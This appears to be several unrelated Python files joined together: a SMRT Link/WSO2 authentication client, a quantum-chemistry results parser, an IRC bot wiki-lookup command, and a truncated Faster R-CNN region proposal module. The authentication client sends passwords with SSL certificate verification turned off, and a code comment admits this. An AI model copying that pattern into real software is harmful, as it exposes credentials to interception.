def create_task(self, task_uuid, task_id, task_type_id, name, created_at=None):
"""
:param task_uuid: Globally unique task id
:param task_id: Unique within respect to the job
:param task_type_id: ToolContract or task id (e.g., pbcommand.tasks.alpha)
:param name: Display name of task
:param created_at: time task was created at (will be set if current time if None)
"""
r = CreateJobTaskRecord(task_uuid, task_id, task_type_id,
name, JobStates.CREATED, created_at=created_at)
return _create_job_task(self.tasks_url, r)
def update_task_status(self, task_uuid, state, message, error_message=None):
task_url = self.get_task_url(task_uuid)
u = UpdateJobTaskRecord(task_uuid, state, message, error_message=error_message)
return _update_job_task_state(task_url, u, ignore_errors=self.ignore_errors)
def update_task_to_failed(self, task_uuid, message, detailed_error_message):
task_url = self.get_task_url(task_uuid)
state = JobStates.FAILED
u = UpdateJobTaskRecord(task_uuid,
state,
message,
error_message=detailed_error_message)
return _update_job_task_state(task_url, u)
#-----------------------------------------------------------------------
# SSL stuff
class Wso2Constants(object): # pragma: no cover
SECRET = "<KEY>"
CONSUMER_KEY = "<KEY>"
SCOPES = ["welcome", "run-design", "run-qc", "openid", "analysis",
"sample-setup", "data-management", "userinfo"]
def _create_auth(secret, consumer_key): # pragma: no cover
return base64.b64encode(":".join([secret, consumer_key]))
def get_token(url, user, password, scopes, secret, consumer_key): # pragma: no cover
basic_auth = _create_auth(secret, consumer_key)
# To be explicit for pedagogical purposes
headers = {
"Authorization": "Basic {}".format(basic_auth),
"Content-Type": "application/x-www-form-urlencoded"
}
scope_str = " ".join({s for s in scopes})
payload = dict(grant_type="password",
username=user,
password=password,
scope=scope_str)
# verify is false to disable the SSL cert verification
return requests.post(url, payload, headers=headers, verify=False)
def _get_smrtlink_wso2_token(user, password, url): # pragma: no cover
r = get_token(url, user, password, Wso2Constants.SCOPES, Wso2Constants.SECRET, Wso2Constants.CONSUMER_KEY)
j = r.json()
access_token = j['access_token']
refresh_token = j['refresh_token']
scopes = j['scope'].split(" ")
return access_token, refresh_token, scopes
class SmrtLinkAuthClient(ServiceAccessLayer): # pragma: no cover
"""
HTTPS-enabled client that routes via WSO2 and requires authentication.
For internal use only - this is NOT an officially supported API. Currently
somewhat sloppy w.r.t. SSL security features.
"""
def __init__(self, base_url, user, password, port=8243, debug=False,
sleep_time=2, token=None):
super(SmrtLinkAuthClient, self).__init__(base_url, port, debug=debug, sleep_time=sleep_time)
self._user = user
self._password = password
if token is None:
if (user is None or password is None):
raise ValueError("Both user and password must be defined unless an existing auth token is supplied")
self._login()
else:
# assume token is valid. This will fail on the first client request if not valid with an obvious error message
self.auth_token = token
self.refresh_token = None
def _login(self):
url = "{u}:{p}/token".format(u=self.base_url, p=self.port)
self.auth_token, self.refresh_token, _ = _get_smrtlink_wso2_token(self._user, self._password, url)
def _get_headers(self):
return {
"Authorization": "Bearer {}".format(self.auth_token),
"Content-type": "application/json"
}
def _to_base_url(self, h):
if h.startswith("http://"):
raise ValueError("Invalid URL - this client requires HTTPS")
prefix = "https://"
return h if h.startswith(prefix) else prefix + h
@property
def uri(self):
return "{b}:{u}/SMRTLink/1.0.0".format(b=self.base_url, u=self.port)
def reauthenticate_if_necessary(self):
"""
Check whether the client still has authorization to access the /status
endpoint, and acquire a new auth token if not.
"""
try:
status = self.get_status()
except requests.exceptions.HTTPError as e:
if e.response.status_code == 401:
self._login()
else:
raise e
def get_smrtlink_client(host, port, user=None, password=None, sleep_time=5): # pragma: no cover
"""
Convenience method for use in CLI testing tools. Returns an instance of
the appropriate client class given the input parameters. Unlike the client
itself this hardcodes 8243 as the WSO2 port number.
"""
if host != "localhost" or None not in [user, password]:
return SmrtLinkAuthClient(host, user, password, sleep_time=sleep_time)
else:
return ServiceAccessLayer(host, port, sleep_time=sleep_time)
|
<reponame>berquist/sgr_analysis
"""sapt_vs_almo.py: Parse a set of ALMO output files for their
interaction energy components, writing to a CSV file."""
from glob import glob
import csv
import os.path
import numpy as np
from sgr_analysis.sapt.helpers import (BIN_TO_WEIGHT_MAP, read_psi4_sapt0_with_snapnum_and_weight,
read_qchem_eda_v1, snapnum_to_bin_map)
from sgr_analysis.sapt.summary import method_basis_outer_product
if __name__ == '__main__':
root_dir = '/home/eric/Chemistry/calc.sgr/paper_02_CD_SC/sapt/sapt_vs_almo/'
root_dir_sapt = '/home/eric/Chemistry/calc.sgr/paper_02_CD_SC/sapt/631gdp/ct/'
root_dir_paper1 = '/home/eric/Chemistry/calc.sgr/paper_02_CD_SC/sapt/almo_eda_paper1/'
filenames_hf_cp = sorted(glob(root_dir + '*hf_6-31gss_cp.out'))
filenames_hf_nocp = sorted(glob(root_dir + '*hf_6-31gss_nocp.out'))
filenames_b3lyp_cp = sorted(glob(root_dir + '*b3lyp_6-31gss_cp.out'))
filenames_b3lyp_nocp = sorted(glob(root_dir + '*b3lyp_6-31gss_nocp.out'))
filenames_b3lypd2_cp = sorted(glob(root_dir + '*b3lyp-d2_6-31gss_cp.out'))
filenames_b3lypd2_nocp = sorted(glob(root_dir + '*b3lyp-d2_6-31gss_nocp.out'))
filenames_b3lypd3_cp = sorted(glob(root_dir + '*b3lyp-d3_6-31gss_cp.out'))
filenames_b3lypd3_nocp = sorted(glob(root_dir + '*b3lyp-d3_6-31gss_nocp.out'))
filenames_wb97xd_pople_cp = sorted(glob(root_dir + '*wb97x-d_6-31gss_cp.out'))
filenames_wb97xd_pople_nocp = sorted(glob(root_dir + '*wb97x-d_6-31gss_nocp.out'))
filenames_wb97mv_pople_cp = sorted(glob(root_dir + '*wb97m-v_6-31gss_cp.out'))
filenames_wb97mv_pople_nocp = sorted(glob(root_dir + '*wb97m-v_6-31gss_nocp.out'))
filenames_wb97xd_dunning_cp = sorted(glob(root_dir + '*wb97x-d_cc-pvtz_cp.out'))
filenames_wb97xd_dunning_nocp = sorted(glob(root_dir + '*wb97x-d_cc-pvtz_nocp.out'))
filenames_wb97mv_dunning_cp = sorted(glob(root_dir + '*wb97m-v_cc-pvtz_cp.out'))
filenames_wb97mv_dunning_nocp = sorted(glob(root_dir + '*wb97m-v_cc-pvtz_nocp.out'))
filenames_sapt = sorted(glob(root_dir_sapt + '*.out'))
filenames_paper1 = sorted(glob(root_dir_paper1 + '*.out'))
batches = (
filenames_hf_cp,
filenames_hf_nocp,
filenames_b3lyp_cp,
filenames_b3lyp_nocp,
filenames_b3lypd2_cp,
filenames_b3lypd2_nocp,
filenames_b3lypd3_cp,
filenames_b3lypd3_nocp,
filenames_wb97xd_pople_cp,
filenames_wb97xd_pople_nocp,
filenames_wb97mv_pople_cp,
filenames_wb97mv_pople_nocp,
filenames_wb97xd_dunning_cp,
filenames_wb97xd_dunning_nocp,
filenames_wb97mv_dunning_cp,
filenames_wb97mv_dunning_nocp,
)
map_is_cp = {
'cp': True,
'nocp': False,
}
snapnums = set()
almo_data = dict()
for batch in batches:
for filename in batch:
stub = os.path.splitext(os.path.basename(filename))[0]
print(stub)
stub_tokens = stub.split('_')
snapnum = int(stub_tokens[1])
snapnums.add(snapnum)
method = stub_tokens[6] + '_' + stub_tokens[7]
cp_flag = stub_tokens[-1]
is_cp = map_is_cp[cp_flag]
if method not in almo_data:
almo_data[method] = dict()
if cp_flag not in almo_data[method]:
almo_data[method][cp_flag] = dict()
almo_data_snap = read_qchem_eda_v1(filename, is_cp=is_cp)
almo_data[method][cp_flag][snapnum] = almo_data_snap
snapnums = sorted(snapnums)
weights = [BIN_TO_WEIGHT_MAP[snapnum_to_bin_map[snapnum]]
for snapnum in snapnums]
## Start by writing all the ALMO data to a CSV file.
csvfh = open('data_almo.csv', 'w')
csvwriter = csv.writer(csvfh)
header_not_data = [
'snapnum',
'qc_method',
# 'bsse_corr',
]
header = [
'frz',
'pol',
# 'del_rs',
# 'bsse_rs',
# 'ct_rs',
'del_scf',
'bsse_scf',
'ct_scf',
'tot_scf',
'ho_scf',
]
total_header = header_not_data + header
csvwriter.writerow(total_header)
# Write only the CP-corrected values.
for method_basis_pair in method_basis_outer_product:
qc_method = '_'.join(method_basis_pair)
if qc_method in almo_data:
for snapnum in sorted(almo_data[qc_method]['cp']):
row = [almo_data[qc_method]['cp'][snapnum][column_title]
for column_title in header]
row = [snapnum, qc_method] + row
csvwriter.writerow(row)
csvfh.close()
##########
sapt_data = dict()
snapnums_sapt = set()
for filename in filenames_sapt:
stub = os.path.splitext(os.path.basename(filename))[0]
print(stub)
stub_tokens = stub.split('_')
snapnum = int(stub_tokens[1])
assert snapnum in snapnums
snapnums_sapt.add(snapnum)
sapt_data_snap = read_psi4_sapt0_with_snapnum_and_weight(filename)
sapt_data[snapnum] = sapt_data_snap
snapnums_sapt = sorted(snapnums_sapt)
weights_sapt = [BIN_TO_WEIGHT_MAP[snapnum_to_bin_map[snapnum]]
for snapnum in snapnums_sapt]
csvfh = open('data_all.csv', 'w')
csvwriter = csv.writer(csvfh)
# 20 fields
header = (
'snapnum',
'ALMO/wB97M-V/cc-pVTZ E_frz',
'ALMO/wB97M-V/cc-pVTZ E_pol',
'ALMO/wB97M-V/cc-pVTZ E_del (SCF)',
'ALMO/wB97M-V/cc-pVTZ E_CT (SCF)',
'ALMO/wB97X-D/cc-pVTZ E_frz',
'ALMO/wB97X-D/cc-pVTZ E_pol',
'ALMO/wB97X-D/cc-pVTZ E_del (SCF)',
'ALMO/wB97X-D/cc-pVTZ E_CT (SCF)',
'ALMO/wB97M-V/6-31G(d,p) E_frz',
'ALMO/wB97M-V/6-31G(d,p) E_pol',
'ALMO/wB97M-V/6-31G(d,p) E_del (SCF)',
'ALMO/wB97M-V/6-31G(d,p) E_CT (SCF)',
'ALMO/wB97X-D/6-31G(d,p) E_frz',
'ALMO/wB97X-D/6-31G(d,p) E_pol',
'ALMO/wB97X-D/6-31G(d,p) E_del (SCF)',
'ALMO/wB97X-D/6-31G(d,p) E_CT (SCF)',
'ALMO/B3LYP-D2/6-31G(d,p) E_frz',
'ALMO/B3LYP-D2/6-31G(d,p) E_pol',
'ALMO/B3LYP-D2/6-31G(d,p) E_del (SCF)',
'ALMO/B3LYP-D2/6-31G(d,p) E_CT (SCF)',
'ALMO/B3LYP-D3/6-31G(d,p) E_frz',
'ALMO/B3LYP-D3/6-31G(d,p) E_pol',
'ALMO/B3LYP-D3/6-31G(d,p) E_del (SCF)',
'ALMO/B3LYP-D3/6-31G(d,p) E_CT (SCF)',
'ALMO/B3LYP/6-31G(d,p) E_frz',
'ALMO/B3LYP/6-31G(d,p) E_pol',
'ALMO/B3LYP/6-31G(d,p) E_del (SCF)',
'ALMO/B3LYP/6-31G(d,p) E_CT (SCF)',
'ALMO/HF/6-31G(d,p) E_frz',
'ALMO/HF/6-31G(d,p) E_pol',
'ALMO/HF/6-31G(d,p) E_del (SCF)',
'ALMO/HF/6-31G(d,p) E_CT (SCF)',
'SAPT/6-31G(d,p)/DCBS E_el',
'SAPT/6-31G(d,p)/DCBS E_exch',
'SAPT/6-31G(d,p)/DCBS E_ind',
'SAPT/6-31G(d,p)/DCBS E_ind-exch',
'SAPT/6-31G(d,p)/DCBS E_ind_HO',
'SAPT/6-31G(d,p)/DCBS E_disp',
'SAPT/6-31G(d,p)/DCBS E_disp-exch',
'SAPT/6-31G(d,p)/DCBS E_CT',
)
csvwriter.writerow(header)
rows = []
for snapnum in snapnums_sapt:
line = [
snapnum,
almo_data['wb97m-v_cc-pvtz']['cp'][snapnum]['frz'],
almo_data['wb97m-v_cc-pvtz']['cp'][snapnum]['pol'],
almo_data['wb97m-v_cc-pvtz']['cp'][snapnum]['del_scf'],
almo_data['wb97m-v_cc-pvtz']['cp'][snapnum]['ct_scf'],
almo_data['wb97x-d_cc-pvtz']['cp'][snapnum]['frz'],
almo_data['wb97x-d_cc-pvtz']['cp'][snapnum]['pol'],
almo_data['wb97x-d_cc-pvtz']['cp'][snapnum]['del_scf'],
almo_data['wb97x-d_cc-pvtz']['cp'][snapnum]['ct_scf'],
almo_data['wb97m-v_6-31gss']['cp'][snapnum]['frz'],
almo_data['wb97m-v_6-31gss']['cp'][snapnum]['pol'],
almo_data['wb97m-v_6-31gss']['cp'][snapnum]['del_scf'],
almo_data['wb97m-v_6-31gss']['cp'][snapnum]['ct_scf'],
almo_data['wb97x-d_6-31gss']['cp'][snapnum]['frz'],
almo_data['wb97x-d_6-31gss']['cp'][snapnum]['pol'],
almo_data['wb97x-d_6-31gss']['cp'][snapnum]['del_scf'],
almo_data['wb97x-d_6-31gss']['cp'][snapnum]['ct_scf'],
almo_data['b3lyp-d2_6-31gss']['cp'][snapnum]['frz'],
almo_data['b3lyp-d2_6-31gss']['cp'][snapnum]['pol'],
almo_data['b3lyp-d2_6-31gss']['cp'][snapnum]['del_scf'],
almo_data['b3lyp-d2_6-31gss']['cp'][snapnum]['ct_scf'],
almo_data['b3lyp-d3_6-31gss']['cp'][snapnum]['frz'],
almo_data['b3lyp-d3_6-31gss']['cp'][snapnum]['pol'],
almo_data['b3lyp-d3_6-31gss']['cp'][snapnum]['del_scf'],
almo_data['b3lyp-d3_6-31gss']['cp'][snapnum]['ct_scf'],
almo_data['b3lyp_6-31gss']['cp'][snapnum]['frz'],
almo_data['b3lyp_6-31gss']['cp'][snapnum]['pol'],
almo_data['b3lyp_6-31gss']['cp'][snapnum]['del_scf'],
almo_data['b3lyp_6-31gss']['cp'][snapnum]['ct_scf'],
almo_data['hf_6-31gss']['cp'][snapnum]['frz'],
almo_data['hf_6-31gss']['cp'][snapnum]['pol'],
almo_data['hf_6-31gss']['cp'][snapnum]['del_scf'],
almo_data['hf_6-31gss']['cp'][snapnum]['ct_scf'],
sapt_data[snapnum]['dimer']['el'],
sapt_data[snapnum]['dimer']['exch'],
sapt_data[snapnum]['dimer']['ind'],
sapt_data[snapnum]['dimer']['exch-ind'],
sapt_data[snapnum]['dimer']['ind_HO'],
sapt_data[snapnum]['dimer']['disp'],
sapt_data[snapnum]['dimer']['exch-disp'],
sapt_data[snapnum]['ct'],
]
rows.append(line)
csvwriter.writerow(line)
start = 1
vals = np.array(rows, dtype=float)[:, start:]
average_unweighted = np.average(vals, axis=0, weights=None)
average_weighted = np.average(vals, axis=0, weights=weights_sapt)
csvwriter.writerow(['average (unweighted)'] + average_unweighted.tolist())
csvwriter.writerow(['average (weighted)'] + average_weighted.tolist())
csvfh.close()
# ##########
# almo_data_paper1 = dict()
# csvfh = open('almo_eda_paper1_all.csv', 'w')
# csvwriter = csv.writer(csvfh)
# # 5 fields
# header = (
# 'system',
# 'ALMO/B3LYP E_frz',
# 'ALMO/B3LYP E_pol',
# 'ALMO/B3LYP E_del (SCF)',
# 'ALMO/B3LYP E_CT (SCF)',
# )
# csvwriter.writerow(header)
# for filename in filenames_paper1:
# stub = os.path.splitext(os.path.basename(filename))[0]
# stub_tokens = stub.split('_')
# system = '_'.join(stub_tokens[1:])
# almo_data_system = read_qchem_eda(filename, is_cp=True)
# line = [
# system,
# almo_data_system['frz'],
# almo_data_system['pol'],
# almo_data_system['del_scf'],
# almo_data_system['ct_scf'],
# ]
# csvwriter.writerow(line)
# csvfh.close()
|
<reponame>Didero/DideRobot<filename>commands/MediaWikiLookup.py
import re
import requests
from CommandTemplate import CommandTemplate
from IrcMessage import IrcMessage
from CommandException import CommandException, CommandInputException
import Constants
class Command(CommandTemplate):
# 'Fandom.com' used to be called 'Wikia.com', support both the old and the new name
triggers = ['wikipedia', 'wikipediarandom', 'fandom', 'fandomrandom', 'wikia', 'wikiarandom']
helptext = "Searches Wikipedia or a wiki on Fandom.com for the best-matching article. " \
"Usage: '{commandPrefix}wikipedia [searchquery]' or {commandPrefix}fandom [wiki-name] [searchquery]'. " \
"Or use '{commandPrefix}wikipediarandom' or '{commandPrefix}fandomrandom [wiki-name]' to get a random article from that wiki" \
"'wikia' instead of 'fandom' is also supported because Fandom used to be called Wikia"
def execute(self, message):
"""
:type message: IrcMessage
"""
if message.trigger == 'wikipedia' or message.trigger == 'wikipediarandom':
wikiDisplayName = 'Wikipedia'
wikiApiUrl = "https://en.wikipedia.org/w/api.php"
searchQuery = message.message
elif message.messagePartsLength == 0:
return message.reply("Please tell me which Fandom wiki you want me to use, there's a LOT of them. Turns out humans write a lot of stories!", "say")
else:
wikiDisplayName = "the {} Fandom wiki".format(message.messageParts[0])
wikiApiUrl = "https://{}.fandom.com/api.php".format(message.messageParts[0])
searchQuery = u" ".join(message.messageParts[1:])
shouldPickRandomPage = message.trigger.endswith('random')
#Searches need a search term
if not shouldPickRandomPage and not searchQuery:
return message.reply("What do you want me to search for? Or if you don't know what you want, use the '{}random' command and be surprised!".format(message.trigger), "say")
# We want 1200 characters because that's the maximum allowed, and because we don't know how much we have to chop off because they're preceding images
# We also want the sectionformat to be 'wiki' so we can see where the intro paragraph ends (We can't use 'exintro' for this because images can come first so we'd only get their caption)
requestParams = {'format': 'json', 'utf8': True, 'redirects': True, 'action': 'query', 'prop': 'extracts|info',
'exchars': 1200, 'exlimit': 1, 'explaintext': True, 'exsectionformat': 'wiki', 'inprop': 'url'}
# Namespace: 0 means that it only looks at 'actual' articles, and ignores meta pages, user pages, and the like
if shouldPickRandomPage:
requestParams['generator'] ='random'
requestParams['grnnamespace'] = 0
else:
requestParams['generator'] = 'search'
requestParams['gsrnamespace'] = 0
requestParams['gsrlimit'] = 1
requestParams['gsrsearch'] = searchQuery
try:
apiResult = requests.get(wikiApiUrl, params=requestParams, timeout=10.0)
except requests.exceptions.Timeout:
raise CommandException("{} took too long to respond. Maybe try again in a little while?".format(wikiDisplayName))
if apiResult.status_code == 404:
# Should only happen for Fandom searches and a non-existent wiki
raise CommandInputException("{} doesn't appear to exist. Maybe you made a typo? Or maybe you made a whole new fandom!".format(wikiDisplayName))
if apiResult.status_code != 200:
self.logError(u"[MediaWiki] {} returned an unexpected result for commandtrigger '{}' and query '{}'. Status code is {}, response is {}".format(wikiApiUrl, message.trigger, searchQuery, apiResult.status_code, apiResult.text))
raise CommandException("Uh oh, something went wrong with retrieving data from {}. Either they're having issues, or I am. If this keeps happening, please tell my owner(s) to look into this!".format(wikiDisplayName))
try:
apiData = apiResult.json()
except ValueError:
self.logError(u"[MediaWiki] Invalid JSON reply from API. Wiki url is {}, query was '{}', response is {}".format(wikiApiUrl, searchQuery, apiResult.text))
raise CommandException("Hmm, the data that {} returned isn't exactly what I expected, I'm not sure what to do with this. If this keeps happening, please tell my owner(s) about this!".format(wikiDisplayName))
if 'query' not in apiData or 'pages' not in apiData['query'] or "-1" in apiData['query']['pages']:
raise CommandInputException("Seems like {} doesn't have any information on '{}'. Either you made a typo, or you know more about this than all the wiki editors combined!".format(wikiDisplayName, searchQuery))
# Get the article text, and clean it up a bit
articleData = apiData['query']['pages'].popitem()[1]
articleText = articleData["extract"]
articleUrl = articleData["canonicalurl"]
# If we got more text than just from the first section, it's got newlines and a header indicator (multiple '='s in MediaWiki formatting). Only get the first section
if u'\n=' in articleText:
articleText = re.split('\n+=+', articleText, maxsplit=1)[0]
# Some articles put images and captions at the start of the article, separated by tabs, so we have to remove those
if u'\t' in articleText:
articleText = articleText.rsplit(u'\t', 1)[1].strip()
# Replace any remaining newlines with spaces
if u'\n' in articleText:
articleText = re.sub('\s*\n+\s*', ' ', articleText)
# Limit the article text length to a single IRC message
maxArticleTextLength = Constants.MAX_MESSAGE_LENGTH - len(Constants.GREY_SEPARATOR) - len(articleUrl)
if len(articleText) > maxArticleTextLength:
articleText = articleText[:maxArticleTextLength - 5] + u"[...]"
message.reply(articleText + Constants.GREY_SEPARATOR + articleUrl)
|
<filename>modules/RPN.py
'''
Function:
region proposal net
Author:
Charles
'''
import torch
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
from modules.utils import *
from modules.losses import *
from libs.nms.nms_wrapper import nms
'''
Function:
define the proposal layer for rpn
Init Input:
--feature_stride: stride now.
--anchor_scales: scales for anchor boxes.
--anchor_ratios: ratios for anchor boxes.
--mode: flag about TRAIN or TEST.
--cfg: config file.
Forward Input:
--x_cls_pred/probs: N x 2 x H x W
--x_reg_pred: N x 4 x H x W
--img_info: (height, width, scale_factor)
'''
class rpnProposalLayer(nn.Module):
def __init__(self, feature_stride, anchor_scales, anchor_ratios, mode, cfg, **kwargs):
super(rpnProposalLayer, self).__init__()
self.feature_stride = feature_stride
self.anchors = RegionProposalNet.generateAnchors(scales=anchor_scales, ratios=anchor_ratios)
self.num_anchors = self.anchors.size(0)
if mode == 'TRAIN':
self.pre_nms_topN = cfg.TRAIN_RPN_PRE_NMS_TOP_N
self.post_nms_topN = cfg.TRAIN_RPN_POST_NMS_TOP_N
self.nms_thresh = cfg.TRAIN_RPN_NMS_THRESH
elif mode == 'TEST':
self.pre_nms_topN = cfg.TEST_RPN_PRE_NMS_TOP_N
self.post_nms_topN = cfg.TEST_RPN_POST_NMS_TOP_N
self.nms_thresh = cfg.TEST_RPN_NMS_THRESH
else:
raise ValueError('Unkown mode <%s> in rpnProposalLayer...' % mode)
'''forward'''
def forward(self, x):
# prepare
probs, x_reg_pred, img_info = x
batch_size = probs.size(0)
feature_height, feature_width = probs.size(2), probs.size(3)
# get bg and fg probs
bg_probs = probs[:, :self.num_anchors, :, :]
fg_probs = probs[:, self.num_anchors:, :, :]
# get shift
shift_x = np.arange(0, feature_width) * self.feature_stride
shift_y = np.arange(0, feature_height) * self.feature_stride
shift_x, shift_y = np.meshgrid(shift_x, shift_y)
shifts = torch.from_numpy(np.vstack((shift_x.ravel(), shift_y.ravel(), shift_x.ravel(), shift_y.ravel())).transpose())
shifts = shifts.contiguous().type_as(fg_probs).float()
# get anchors
anchors = self.anchors.type_as(fg_probs)
anchors = anchors.view(1, self.num_anchors, 4) + shifts.view(shifts.size(0), 1, 4)
anchors = anchors.view(1, self.num_anchors*shifts.size(0), 4).expand(batch_size, self.num_anchors*shifts.size(0), 4)
# format x_reg_pred
bbox_deltas = x_reg_pred.permute(0, 2, 3, 1).contiguous()
bbox_deltas = bbox_deltas.view(batch_size, -1, 4)
# format fg_probs
fg_probs = fg_probs.permute(0, 2, 3, 1).contiguous()
fg_probs = fg_probs.view(batch_size, -1)
# convert anchors to proposals
proposals = BBoxFunctions.anchors2Proposals(anchors, bbox_deltas)
# clip predicted boxes to image
proposals = BBoxFunctions.clipBoxes(proposals, img_info)
# do nms
scores = fg_probs
_, order = torch.sort(scores, 1, True)
output = scores.new(batch_size, self.post_nms_topN, 5).zero_()
for i in range(batch_size):
proposals_single = proposals[i]
scores_single = scores[i]
order_single = order[i]
if self.pre_nms_topN > 0 and self.pre_nms_topN < scores.numel():
order_single = order_single[:self.pre_nms_topN]
proposals_single = proposals_single[order_single, :]
scores_single = scores_single[order_single].view(-1, 1)
_, keep_idxs = nms(torch.cat((proposals_single, scores_single), 1), self.nms_thresh)
keep_idxs = keep_idxs.long().view(-1)
if self.post_nms_topN > 0:
keep_idxs = keep_idxs[:self.post_nms_topN]
proposals_single = proposals_single[keep_idxs, :]
scores_single = scores_single[keep_idxs, :]
num_proposals = proposals_single.size(0)
output[i, :, 0] = i
output[i, :num_proposals, 1:] = proposals_single
return output
def backward(self, *args):
pass
'''build target layer for rpn'''
class rpnBuildTargetLayer(nn.Module):
def __init__(self, feature_stride, anchor_scales, anchor_ratios, mode, cfg, **kwargs):
super(rpnBuildTargetLayer, self).__init__()
self.feature_stride = feature_stride
self.anchors = RegionProposalNet.generateAnchors(scales=anchor_scales, ratios=anchor_ratios)
if mode == 'TRAIN':
self.rpn_negative_overlap = cfg.TRAIN_RPN_NEGATIVE_OVERLAP
self.rpn_positive_overlap = cfg.TRAIN_RPN_POSITIVE_OVERLAP
self.rpn_fg_fraction = cfg.TRAIN_RPN_FG_FRACTION
self.rpn_batch_size = cfg.TRAIN_RPN_BATCHSIZE
elif mode == 'TEST':
self.rpn_negative_overlap = cfg.TEST_RPN_NEGATIVE_OVERLAP
self.rpn_positive_overlap = cfg.TEST_RPN_POSITIVE_OVERLAP
self.rpn_fg_fraction = cfg.TEST_RPN_FG_FRACTION
self.rpn_batch_size = cfg.TEST_RPN_BATCHSIZE
else:
raise ValueError('Unkown mode <%s> in rpnBuildTargetLayer...' % mode)
self.num_anchors = self.anchors.size(0)
self.allowed_border = 0
'''forward'''
def forward(self, x):
# prepare
x_cls_pred, gt_boxes, img_info, num_gt_boxes = x
batch_size = gt_boxes.size(0)
feature_height, feature_width = x_cls_pred.size(2), x_cls_pred.size(3)
# get shift
shift_x = np.arange(0, feature_width) * self.feature_stride
shift_y = np.arange(0, feature_height) * self.feature_stride
shift_x, shift_y = np.meshgrid(shift_x, shift_y)
shifts = torch.from_numpy(np.vstack((shift_x.ravel(), shift_y.ravel(), shift_x.ravel(), shift_y.ravel())).transpose())
shifts = shifts.contiguous().type_as(x_cls_pred).float()
# get anchors
anchors = self.anchors.type_as(gt_boxes)
anchors = anchors.view(1, self.num_anchors, 4) + shifts.view(shifts.size(0), 1, 4)
anchors = anchors.view(self.num_anchors*shifts.size(0), 4)
total_anchors_ori = anchors.size(0)
# make sure anchors are in the image
keep_idxs = ((anchors[:, 0] >= -self.allowed_border) &
(anchors[:, 1] >= -self.allowed_border) &
(anchors[:, 2] < int(img_info[0][1])+self.allowed_border) &
(anchors[:, 3] < int(img_info[0][0])+self.allowed_border))
keep_idxs = torch.nonzero(keep_idxs).view(-1)
anchors = anchors[keep_idxs, :]
# prepare labels: 1 is positive, 0 is negative, -1 means ignore
labels = gt_boxes.new(batch_size, keep_idxs.size(0)).fill_(-1)
# prepare bbox mask: 0 means ignore, 1 is adopted
bbox_mask = gt_boxes.new(batch_size, keep_idxs.size(0)).zero_()
# calc ious
overlaps = BBoxFunctions.calcIoUs(anchors, gt_boxes)
max_overlaps, argmax_overlaps = torch.max(overlaps, 2)
gt_max_overlaps, _ = torch.max(overlaps, 1)
# assign labels
labels[max_overlaps < self.rpn_negative_overlap] = 0
gt_max_overlaps[gt_max_overlaps==0] = 1e-5
keep_idxs_label = torch.sum(overlaps.eq(gt_max_overlaps.view(batch_size, 1, -1).expand_as(overlaps)), 2)
if torch.sum(keep_idxs_label) > 0:
labels[keep_idxs_label > 0] = 1
labels[max_overlaps >= self.rpn_positive_overlap] = 1
max_num_fg = int(self.rpn_fg_fraction * self.rpn_batch_size)
num_fg = torch.sum((labels == 1).int(), 1)
num_bg = torch.sum((labels == 0).int(), 1)
for i in range(batch_size):
if num_fg[i] > max_num_fg:
fg_idxs = torch.nonzero(labels[i] == 1).view(-1)
rand_num = torch.from_numpy(np.random.permutation(fg_idxs.size(0))).type_as(gt_boxes).long()
disable_idxs = fg_idxs[rand_num[:fg_idxs.size(0)-max_num_fg]]
labels[i][disable_idxs] = -1
max_num_bg = self.rpn_batch_size - torch.sum((labels == 1).int(), 1)[i]
if num_bg[i] > max_num_bg:
bg_idxs = torch.nonzero(labels[i] == 0).view(-1)
rand_num = torch.from_numpy(np.random.permutation(bg_idxs.size(0))).type_as(gt_boxes).long()
disable_idxs = bg_idxs[rand_num[:bg_idxs.size(0)-max_num_bg]]
labels[i][disable_idxs] = -1
offsets = torch.arange(0, batch_size) * gt_boxes.size(1)
argmax_overlaps = argmax_overlaps + offsets.view(batch_size, 1).type_as(argmax_overlaps)
gt_rois = gt_boxes.view(-1, 5)[argmax_overlaps.view(-1), :].view(batch_size, -1, 5)
bbox_targets = BBoxFunctions.encodeBboxes(anchors, gt_rois[..., :4])
bbox_mask[labels==1] = 1
# unmap
labels = rpnBuildTargetLayer.unmap(labels, total_anchors_ori, keep_idxs, batch_size, fill=-1)
labels = labels.view(batch_size, feature_height, feature_width, self.num_anchors).permute(0, 3, 1, 2).contiguous()
labels = labels.view(batch_size, 1, self.num_anchors*feature_height, feature_width)
bbox_targets = rpnBuildTargetLayer.unmap(bbox_targets, total_anchors_ori, keep_idxs, batch_size, fill=0)
bbox_targets = bbox_targets.view(batch_size, feature_height, feature_width, self.num_anchors*4).permute(0, 3, 1, 2).contiguous()
bbox_mask = rpnBuildTargetLayer.unmap(bbox_mask, total_anchors_ori, keep_idxs, batch_size, fill=0)
bbox_mask = bbox_mask.view(batch_size, total_anchors_ori, 1).expand(batch_size, total_anchors_ori, 4)
bbox_mask = bbox_mask.contiguous().view(batch_size, feature_height, feature_width, 4*self.num_anchors).permute(0, 3, 1, 2).contiguous()
# pack return values into outputs
outputs = [labels, bbox_targets, bbox_mask]
return outputs
@staticmethod
def unmap(data, count, inds, batch_size, fill=0):
if data.dim() == 2:
ret = torch.Tensor(batch_size, count).fill_(fill).type_as(data)
ret[:, inds] = data
else:
ret = torch.Tensor(batch_size, count, data.size(2)).fill_(fill).type_as(data)
ret[:, inds, :] = data
return ret
def backward(self, *args):
pass
'''region proposal net'''
class RegionProposalNet(nn.Module):
def __init__(self, in_channels, feature_stride, mode, cfg, **kwargs):
super(RegionProposalNet, self).__init__()
# prepare
self.anchor_scales = cfg.ANCHOR_SCALES
self.anchor_ratios = cfg.ANCHOR_RATIOS
self.feature_stride = feature_stride
self.mode = mode
self.cfg = cfg
# define rpn conv
self.rpn_conv_trans = nn.Sequential(nn.Conv2d(in_channels=in_channels, out_channels=512, kernel_size=3, stride=1, padding=1, bias=True),
nn.ReLU(inplace=True))
self.out_channels_cls = len(self.anchor_scales) * len(self.anchor_ratios) * 2
self.out_channels_reg = len(self.anchor_scales) * len(self.anchor_ratios) * 4
self.rpn_conv_cls = nn.Conv2d(in_channels=512, out_channels=self.out_channels_cls, kernel_size=1, stride=1, padding=0)
self.rpn_conv_reg = nn.Conv2d(in_channels=512, out_channels=self.out_channels_reg, kernel_size=1, stride=1, padding=0)
# proposal layer
self.rpn_proposal_layer = rpnProposalLayer(feature_stride=self.feature_stride, anchor_scales=self.anchor_scales, anchor_ratios=self.anchor_ratios, mode=self.mode, cfg=self.cfg)
# build target layer
